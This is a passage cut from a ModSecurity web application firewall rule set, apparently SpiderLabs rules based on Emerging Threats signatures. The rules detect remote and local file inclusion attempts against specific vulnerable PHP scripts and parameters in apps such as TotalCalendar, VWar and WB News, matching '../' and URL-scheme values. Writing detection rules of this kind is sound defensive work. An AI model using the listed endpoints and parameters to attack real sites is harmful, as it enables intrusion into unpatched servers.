tt_docroot',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003711) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion produkte_nach_serie_alle.php tt_docroot SecRule REQUEST_LINE "@contains /produkte_nach_serie_alle.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003711,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion produkte_nach_serie_alle.php tt_docroot',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3885'" SecRule ARGS_NAMES "(?i:tt_docroot)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion produkte_nach_serie_alle.php tt_docroot',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003712) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion surfer_aendern.php tt_docroot SecRule REQUEST_LINE "@contains /surfer_aendern.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003712,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion surfer_aendern.php tt_docroot',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3885'" SecRule ARGS_NAMES "(?i:tt_docroot)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion surfer_aendern.php tt_docroot',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003715) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion ref_kd_rubrik.php tt_docroot SecRule REQUEST_LINE "@contains /ref_kd_rubrik.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003715,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion ref_kd_rubrik.php tt_docroot',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3885'" SecRule ARGS_NAMES "(?i:tt_docroot)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion ref_kd_rubrik.php tt_docroot',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003713) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion referenz.php tt_docroot SecRule REQUEST_LINE "@contains /module/referenz.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003713,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion referenz.php tt_docroot',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3885'" SecRule ARGS_NAMES "(?i:tt_docroot)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion referenz.php tt_docroot',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003714) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion lay.php tt_docroot SecRule REQUEST_LINE "@contains /standard/1/lay.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003714,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion lay.php tt_docroot',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3885'" SecRule ARGS_NAMES "(?i:tt_docroot)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion lay.php tt_docroot',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003867) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion 3_lay.php tt_docroot SecRule REQUEST_LINE "@contains /standard/3/lay.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003867,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion 3_lay.php tt_docroot',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3885'" SecRule ARGS_NAMES "(?i:tt_docroot)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TellTarget CMS Remote Inclusion 3_lay.php tt_docroot',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009169) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Thyme export.php export_to Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /export.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009169,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Thyme export.php export_to Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,33731'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:export_to "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Thyme export.php export_to Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009789) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TinyButStrong bs_us_examples_0view.php script Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /examples/tbs_us_examples_0view.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009789,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS TinyButStrong bs_us_examples_0view.php script Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:script "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TinyButStrong bs_us_examples_0view.php script Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003669) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TopTree Remote Inclusion Attempt -- tpl_message.php right_file SecRule REQUEST_LINE "@contains /templates/default/tpl_message.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003669,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS TopTree Remote Inclusion Attempt -- tpl_message.php right_file',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3854'" SecRule &TX:'/RFI.*ARGS:right_file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TopTree Remote Inclusion Attempt -- tpl_message.php right_file',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009663) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TotalCalendar config.php inc_dir Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /config.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009663,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS TotalCalendar config.php inc_dir Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,34617'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:inc_dir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TotalCalendar config.php inc_dir Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009726) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TotalCalendar config.php inc_dir Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /config.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009726,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS TotalCalendar config.php inc_dir Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34617'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:inc_dir "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TotalCalendar config.php inc_dir Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009729) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TotalCalendar cms_detect.php include Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /cms_detect.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009729,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS TotalCalendar cms_detect.php include Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34634'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:include "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TotalCalendar cms_detect.php include Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003678) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Tropicalm Remote Inclusion Attempt -- dosearch.php RESPATH SecRule REQUEST_LINE "@contains /dosearch.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003678,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Tropicalm Remote Inclusion Attempt -- dosearch.php RESPATH',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3865'" SecRule &TX:'/RFI.*ARGS:RESPATH/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Tropicalm Remote Inclusion Attempt -- dosearch.php RESPATH',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003687) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TurnKeyWebTools Remote Inclusion Attempt -- payflow_pro.php abs_path SecRule REQUEST_LINE "@contains /include/payment/payflow_pro.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003687,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS TurnKeyWebTools Remote Inclusion Attempt -- payflow_pro.php abs_path',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23662'" SecRule &TX:'/RFI.*ARGS:abs_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TurnKeyWebTools Remote Inclusion Attempt -- payflow_pro.php abs_path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003688) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TurnKeyWebTools Remote Inclusion Attempt -- global.php abs_path SecRule REQUEST_LINE "@contains /global.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003688,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS TurnKeyWebTools Remote Inclusion Attempt -- global.php abs_path',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23662'" SecRule &TX:'/RFI.*ARGS:abs_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TurnKeyWebTools Remote Inclusion Attempt -- global.php abs_path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003689) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TurnKeyWebTools Remote Inclusion Attempt -- libsecure.php abs_path SecRule REQUEST_LINE "@contains /libsecure.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003689,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS TurnKeyWebTools Remote Inclusion Attempt -- libsecure.php abs_path',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23662'" SecRule &TX:'/RFI.*ARGS:abs_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TurnKeyWebTools Remote Inclusion Attempt -- libsecure.php abs_path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008923) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TxtBlog index.php m Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008923,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS TxtBlog index.php m Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32498'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:m/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TxtBlog index.php m Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010126) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ultrize TimeSheet timesheet.php include_dir Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /include/timesheet.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010126,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Ultrize TimeSheet timesheet.php include_dir Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:config[include_dir]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ultrize TimeSheet timesheet.php include_dir Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010127) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ultrize TimeSheet timesheet.php include_dir Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /include/timesheet.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010127,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Ultrize TimeSheet timesheet.php include_dir Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:config[include_dir] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ultrize TimeSheet timesheet.php include_dir Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003692) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS VM Watermark Remote Inclusion Attempt -- watermark.php GALLERY_BASEDIR SecRule REQUEST_LINE "@contains /watermark.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003692,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS VM Watermark Remote Inclusion Attempt -- watermark.php GALLERY_BASEDIR',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3857'" SecRule &TX:'/RFI.*ARGS:GALLERY_BASEDIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS VM Watermark Remote Inclusion Attempt -- watermark.php GALLERY_BASEDIR',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2002899) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP VWar Remote File Inclusion get_header.php SecRule REQUEST_LINE "@contains /get_header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2002899,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS PHP VWar Remote File Inclusion get_header.php',tag:'web-application-attack',tag:'bugtraq,17358'" SecRule QUERY_STRING|REQUEST_BODY "(?i:vwar_root=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP VWar Remote File Inclusion get_header.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2002902) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP VWar Remote File Inclusion functions_install.php SecRule REQUEST_LINE "@contains /functions_install.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2002902,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHP VWar Remote File Inclusion functions_install.php',tag:'web-application-attack',tag:'bugtraq,17290'" SecRule QUERY_STRING|REQUEST_BODY "(?i:vwar_root=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP VWar Remote File Inclusion functions_install.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010254) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ve-EDIT edit_htmlarea.php highlighter Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /editor/edit_htmlarea.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010254,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Ve-EDIT edit_htmlarea.php highlighter Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:highlighter/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ve-EDIT edit_htmlarea.php highlighter Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010255) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ve-EDIT debug_php.php _GET Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /debugger/debug_php.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010255,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Ve-EDIT debug_php.php _GET Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:_GET[filename] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ve-EDIT debug_php.php _GET Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003671) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Versado CMS Remote Inclusion Attempt -- ajax_listado.php urlModulo SecRule REQUEST_LINE "@contains /includes/ajax_listado.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003671,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Versado CMS Remote Inclusion Attempt -- ajax_listado.php urlModulo',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3847'" SecRule &TX:'/RFI.*ARGS:urlModulo/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Versado CMS Remote Inclusion Attempt -- ajax_listado.php urlModulo',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009877) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS VirtueMart Google Base Component admin.googlebase.php Remote File Inclusion SecRule REQUEST_LINE "@contains /admin.googlebase.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009877,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS VirtueMart Google Base Component admin.googlebase.php Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32098'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS VirtueMart Google Base Component admin.googlebase.php Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009838) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WB News search.php config Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009838,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WB News search.php config Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,33434'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:config[installdir]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WB News search.php config Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009839) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WB News archive.php config Parameter Remote File Inclusion -1 SecRule REQUEST_LINE "@contains /archive.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009839,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WB News archive.php config Parameter Remote File Inclusion -1',tag:'web-application-attack',tag:'bugtraq,33434'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:config[installdir]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WB News archive.php config Parameter Remote File Inclusion -1',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009840) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WB News Archive.php config Parameter Remote File Inclusion -2 SecRule REQUEST_LINE "@contains /base/Archive.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009840,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WB News Archive.php config Parameter Remote File Inclusion -2',tag:'web-application-attack',tag:'bugtraq,33434'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:config[installdir]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WB News Archive.php config Parameter Remote File Inclusion -2',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009841) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WB News comments.php config Parameter Remote File Inclusion -1 SecRule REQUEST_LINE "@contains /comments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009841,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WB News comments.php config Parameter Remote File Inclusion -1',tag:'web-application-attack',tag:'bugtraq,33434'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:config[installdir]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WB News comments.php config Parameter Remote File Inclusion -1',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009842) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WB News Comments.php config Parameter Remote File Inclusion -2 SecRule REQUEST_LINE "@contains /base/Comments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009842,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WB News Comments.php config Parameter Remote File Inclusion -2',tag:'web-application-attack',tag:'bugtraq,33434'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:config[installdir]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WB News Comments.php config Parameter Remote File Inclusion -2',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009843) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WB News news.php config Parameter Remote File Inclusion -1 SecRule REQUEST_LINE "@contains /news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009843,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WB News news.php config Parameter Remote File Inclusion -1',tag:'web-application-attack',tag:'bugtraq,33434'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:config[installdir]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WB News news.php config Parameter Remote File Inclusion -1',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009844) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WB News News.php config Parameter Remote File Inclusion -2 SecRule REQUEST_LINE "@contains /base/News.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009844,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WB News News.php config Parameter Remote File Inclusion -2',tag:'web-application-attack',tag:'bugtraq,33434'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule 